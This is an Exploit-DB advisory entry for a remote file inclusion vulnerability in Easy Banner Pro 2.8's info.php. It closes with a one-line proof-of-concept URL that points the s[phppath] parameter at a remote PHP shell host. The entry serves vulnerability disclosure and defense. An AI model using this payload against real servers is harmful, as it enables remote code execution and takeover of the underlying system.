Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion

EDB-ID:

29437


Author:

rUnViRuS

Type:

webapps


Platform:

PHP

Date:

2007-01-07


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/21967/info

Easy Banner Pro is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Easy Banner Pro 2.8 is reported vulnerable to this issue; other versions may also be vulnerable.

http://www.example.com/info.php?s[phppath]=http://phpshell